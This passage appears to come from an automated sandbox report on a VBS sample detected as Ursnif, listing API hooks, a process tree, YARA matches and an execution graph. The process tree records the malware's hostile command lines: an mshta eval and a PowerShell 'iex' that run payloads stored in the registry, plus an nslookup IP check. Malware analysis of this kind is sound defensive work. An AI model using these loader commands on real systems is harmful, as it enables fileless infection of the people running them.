                                                                                                                                            Data Raw: 38 33 0d 0a 88 00 b4 dc 2d aa 29 3c 22 33 bb 63 07 06 6c b7 f9 ec 96 ea ca d6 58 60 05 22 5c 39 58 81 fb 5f 35 c7 e1 71 09 b3 e5 13 18 a9 07 82 75 de 66 5e 1b 35 8b 82 b2 27 3e 11 ae 79 5e b4 b3 0d 67 10 f5 d0 ef 7a 45 e0 5b 51 d5 2f 26 df f8 6a 78 97 b4 c4 29 90 a6 66 f6 02 51 d8 cb 64 61 9f f7 12 29 b3 ac 50 96 8e fa 8f 20 01 fa 27 a1 fe 0e 85 09 65 f7 a0 f3 d5 78 6b d6 82 8d 1b 6e 1f 99 2f 23 e9 bc 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 83-)<"3clX`"\9X_5quf^5'>y^gzE[Q/&jx)fQda)P 'exkn/#0


                                                                                                                                            Code Manipulations

                                                                                                                                            User Modules

                                                                                                                                            Hook Summary

                                                                                                                                            Function NameHook TypeActive in Processes
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                            CreateProcessAsUserWEATexplorer.exe
                                                                                                                                            CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                            CreateProcessWEATexplorer.exe
                                                                                                                                            CreateProcessWINLINEexplorer.exe
                                                                                                                                            CreateProcessAEATexplorer.exe
                                                                                                                                            CreateProcessAINLINEexplorer.exe

                                                                                                                                            Processes

                                                                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6855020
                                                                                                                                            Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            CreateProcessAsUserWEAT7FFABB03521C
                                                                                                                                            CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            CreateProcessWEAT7FFABB035200
                                                                                                                                            CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            CreateProcessAEAT7FFABB03520E
                                                                                                                                            CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                            Process: explorer.exe, Module: WININET.dll
                                                                                                                                            Function NameHook TypeNew Data
                                                                                                                                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6855020

                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:12:18:39
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
                                                                                                                                            Imagebase:0x7ff6defc0000
                                                                                                                                            File size:163840 bytes
                                                                                                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:05
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                            Imagebase:0x7ff667450000
                                                                                                                                            File size:823560 bytes
                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:06
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:11
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:17
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:24
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                            Imagebase:0x7ff7e3470000
                                                                                                                                            File size:14848 bytes
                                                                                                                                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:26
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                            Imagebase:0x7ff7bedd0000
                                                                                                                                            File size:447488 bytes
                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:26
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:39
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
                                                                                                                                            Imagebase:0x7ff72bda0000
                                                                                                                                            File size:2739304 bytes
                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:40
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
                                                                                                                                            Imagebase:0x7ff7cafe0000
                                                                                                                                            File size:47280 bytes
                                                                                                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:44
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
                                                                                                                                            Imagebase:0x7ff72bda0000
                                                                                                                                            File size:2739304 bytes
                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:45
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\control.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                            Imagebase:0x7ff72cb90000
                                                                                                                                            File size:117760 bytes
                                                                                                                                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:45
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
                                                                                                                                            Imagebase:0x7ff7cafe0000
                                                                                                                                            File size:47280 bytes
                                                                                                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:19:54
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6fee60000
                                                                                                                                            File size:3933184 bytes
                                                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:12:19:56
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6b0ff0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:12:20:00
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6b0ff0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            General

                                                                                                                                            Start time:12:20:03
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
                                                                                                                                            Imagebase:0xc60000
                                                                                                                                            File size:273920 bytes
                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                            General

                                                                                                                                            Start time:12:20:03
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6b0ff0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            General

                                                                                                                                            Start time:12:20:07
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                            General

                                                                                                                                            Start time:12:20:07
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\nslookup.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                                                                                                            Imagebase:0x7ff69c1d0000
                                                                                                                                            File size:86528 bytes
                                                                                                                                            MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                            General

                                                                                                                                            Start time:12:20:09
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6b0ff0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            General

                                                                                                                                            Start time:12:20:12
                                                                                                                                            Start date:23/11/2020
                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                            Imagebase:0x7ff7e3a80000
                                                                                                                                            File size:69632 bytes
                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >

                                                                                                                                              Executed Functions

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000003.745965279.00000164FEC10000.00000010.00000001.sdmp, Offset: 00000164FEC10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_3_164fec10000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                              • Instruction ID: 6b68fdca96454f3b21c7927874755cba18045e35a5dea756eba2e05ca586b731
                                                                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                              • Instruction Fuzzy Hash: F690021449548666D42411950C4729D54416388691FD544C0651690144D44F02965252
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000003.745965279.00000164FEC10000.00000010.00000001.sdmp, Offset: 00000164FEC10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_3_164fec10000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                              • Instruction ID: 6b68fdca96454f3b21c7927874755cba18045e35a5dea756eba2e05ca586b731
                                                                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                              • Instruction Fuzzy Hash: F690021449548666D42411950C4729D54416388691FD544C0651690144D44F02965252
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:5.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:34.4%
                                                                                                                                              Total number of Nodes:634
                                                                                                                                              Total number of Limit Nodes:48

                                                                                                                                              Graph

                                                                                                                                              execution_graph 14229 b95ab9 14230 b95ac9 14229->14230 14232 b95af0 14229->14232 14231 b91e58 2 API calls 14230->14231 14230->14232 14231->14232 14530 b75bb7 14533 b8f0c4 14530->14533 14536 b8f0f8 14533->14536 14534 b75bd4 14536->14534 14537 b8076c 4 API calls 14536->14537 14538 b8f15f 14536->14538 14537->14538 14538->14534 14539 b794f0 14538->14539 14540 b79513 14539->14540 14541 b79540 14540->14541 14542 b91e58 2 API calls 14540->14542 14541->14534 14542->14541 14547 b9afb8 14548 b9b025 14547->14548 14549 b9b11e 14548->14549 14550 b8f0c4 4 API calls 14548->14550 14553 b8f0c4 4 API calls 14549->14553 14554 b9ba3e 14549->14554 14551 b9b095 14550->14551 14551->14549 14552 b8f0c4 4 API calls 14551->14552 14555 b9b0b5 14552->14555 14558 b9b1c8 14553->14558 14555->14549 14556 b8f0c4 4 API calls 14555->14556 14557 b9b0e9 14556->14557 14557->14549 14560 b8f0c4 4 API calls 14557->14560 14558->14554 14559 b9b51a 14558->14559 14561 b8f0c4 4 API calls 14558->14561 14559->14554 14562 b9a864 2 API calls 14559->14562 14560->14549 14563 b9b3a1 14561->14563 14571 b9b551 14562->14571 14563->14554 14565 b9a7cc 2 API calls 14563->14565 14567 b9b3f4 14563->14567 14565->14567 14566 b9acac 8 API calls 14566->14571 14574 b89cb0 14567->14574 14568 b998dc 3 API calls 14568->14571 14569 b917c8 3 API calls 14569->14571 14570 b71e24 3 API calls 14570->14571 14571->14554 14571->14566 14571->14568 14571->14569 14571->14570 14573 b794f0 RegCreateKeyA RegOpenKeyA 14571->14573 14579 b7c134 14571->14579 14573->14571 14575 b8dc90 2 API calls 14574->14575 14577 b89cf0 14575->14577 14576 b89f35 14576->14559 14577->14576 14578 b9676c 14 API calls 14577->14578 14578->14577 14580 b8076c 4 API calls 14579->14580 14581 b7c15b 14580->14581 14582 b998dc 3 API calls 14581->14582 14583 b7c27d 14581->14583 14582->14583 14584 b91e58 2 API calls 14583->14584 14585 b7c365 14583->14585 14584->14585 14585->14571 14239 b956bd 14242 b97ef4 14239->14242 14241 b956cf 14243 b97f1b 14242->14243 14245 b98038 14242->14245 14244 b9676c 14 API calls 14243->14244 14243->14245 14247 b97f99 14244->14247 14245->14241 14246 b91504 lstrcmp 14246->14245 14247->14245 14247->14246 14248 b726b0 14249 b72767 14248->14249 14250 b726db 14248->14250 14250->14249 14251 b8f560 24 API calls 14250->14251 14251->14249 14256 b7feb8 14257 b7fefe 14256->14257 14258 b76818 6 API calls 14257->14258 14259 b80045 14257->14259 14258->14259 14217 b91ba4 14218 b91bf9 CreateProcessW 14217->14218 14219 b91bed 14217->14219 14220 b91c63 14218->14220 14221 b91c54 14218->14221 14219->14218 14223 b87910 14221->14223 14228 b87949 14223->14228 14224 b879cf 14225 b727e8 20 API calls 14224->14225 14226 b879bd 14225->14226 14226->14220 14227 b879a6 RtlDeleteBoundaryDescriptor 14227->14224 14227->14226 14228->14224 14228->14227 14608 ba11a4 14609 ba11b0 14608->14609 14610 ba1310 LoadLibraryA 14609->14610 14611 ba11ef 14610->14611 14616 ba1198 14617 ba111f 14616->14617 14617->14616 14618 ba1310 LoadLibraryA 14617->14618 14618->14617 14623 b7a994 14624 b7a9bc 14623->14624 14625 b7aa8c 14624->14625 14626 b87910 21 API calls 14624->14626 14626->14625 14206 b78690 14207 b786bb 14206->14207 14212 b786c3 14206->14212 14208 b81ac4 NtQueryInformationProcess 14207->14208 14208->14212 14209 b787ca 14210 b87dd8 2 API calls 14210->14212 14211 b9feb8 5 API calls 14211->14212 14212->14209 14212->14210 14212->14211 14276 b95688 14279 b82f0c 14276->14279 14278 b956b8 14280 b82f4c 14279->14280 14284 b82f54 14280->14284 14285 b9f1d4 14280->14285 14282 b8302e 14283 b9f1d4 3 API calls 14282->14283 14282->14284 14283->14284 14284->14278 14286 b9f1fd 14285->14286 14288 b9f236 14286->14288 14289 b998dc 14286->14289 14288->14282 14290 b9990c 14289->14290 14295 b98108 14290->14295 14292 b99cf0 14292->14288 14293 b99a92 14293->14292 14299 b71e24 14293->14299 14296 b98126 14295->14296 14298 b9812b 14295->14298 14297 b71e24 3 API calls 14296->14297 14297->14298 14298->14293 14300 b71e4f 14299->14300 14301 b90f8c 3 API calls 14300->14301 14302 b71e75 14301->14302 14303 b71eac 14302->14303 14305 b9a7cc 14302->14305 14303->14292 14308 b9a7e5 14305->14308 14306 b9a864 2 API calls 14307 b9a815 14306->14307 14307->14303 14308->14306 14308->14307 14645 b95588 14646 b955a3 14645->14646 14647 b82f0c 3 API calls 14646->14647 14648 b955cc 14646->14648 14647->14648 14653 ba0580 14654 ba05af 14653->14654 14655 ba05ca 14654->14655 14657 b95f7c 14654->14657 14658 b95f8b 14657->14658 14659 b95fbd 14657->14659 14660 b96fc4 3 API calls 14658->14660 14659->14655 14660->14659 14668 b92d84 14671 b79420 14668->14671 14676 b86f80 14671->14676 14675 b7949f 14677 b8702d 14676->14677 14681 b86f9e 14676->14681 14678 b9f1d4 3 API calls 14677->14678 14678->14681 14679 b7943f 14679->14675 14685 b96064 14679->14685 14680 b8708d 14682 b91e58 2 API calls 14680->14682 14681->14679 14681->14680 14683 b870c0 14681->14683 14682->14679 14683->14679 14684 b91e58 2 API calls 14683->14684 14684->14679 14686 b9609f 14685->14686 14687 b8076c 4 API calls 14686->14687 14698 b96238 14686->14698 14688 b960d5 14687->14688 14689 b9676c 14 API calls 14688->14689 14688->14698 14690 b961a4 14689->14690 14691 b91504 lstrcmp 14690->14691 14690->14698 14692 b961c9 14691->14692 14693 b91504 lstrcmp 14692->14693 14692->14698 14694 b961ee 14693->14694 14695 b91504 lstrcmp 14694->14695 14694->14698 14696 b96213 14695->14696 14697 b91504 lstrcmp 14696->14697 14696->14698 14697->14698 14698->14675 14313 b9a8f8 14314 b9a9b0 14313->14314 14316 b9a900 14313->14316 14315 b8f560 24 API calls 14315->14314 14316->14314 14316->14315 14714 b955e4 14715 b955fc 14714->14715 14717 b9561e 14714->14717 14716 b82f0c 3 API calls 14715->14716 14716->14717 14352 b954d3 14355 b93930 14352->14355 14354 b954de 14357 b9395a 14355->14357 14356 b939b4 14356->14354 14357->14356 14357->14357 14358 b75d98 2 API calls 14357->14358 14358->14356 14368 b956d4 14370 b956de 14368->14370 14369 b75d98 2 API calls 14371 b95b2c 14369->14371 14370->14369 14370->14371 14372 b974cc 14373 b97510 14372->14373 14374 b977d5 14373->14374 14376 b97584 14373->14376 14380 b976a5 14373->14380 14375 b9676c 14 API calls 14374->14375 14378 b97836 14375->14378 14377 b91e58 2 API calls 14376->14377 14376->14380 14377->14380 14379 b91504 lstrcmp 14378->14379 14378->14380 14379->14380 14739 b755c9 14740 b8ebd4 6 API calls 14739->14740 14741 b755ce 14740->14741 14742 b910cc 2 API calls 14741->14742 14743 b755ef 14741->14743 14742->14743 14390 b8e03c 14391 b8e078 14390->14391 14392 b8e11e 14390->14392 14391->14392 14393 b91e58 2 API calls 14391->14393 14394 b8e109 14393->14394 14395 b79d84 6 API calls 14394->14395 14395->14392 14755 b95b3d 14756 b95b49 14755->14756 14758 b95b58 14756->14758 14759 b92da0 14756->14759 14762 b92dc0 14759->14762 14760 b92e31 14760->14758 14761 b91e58 2 API calls 14761->14760 14762->14760 14762->14761 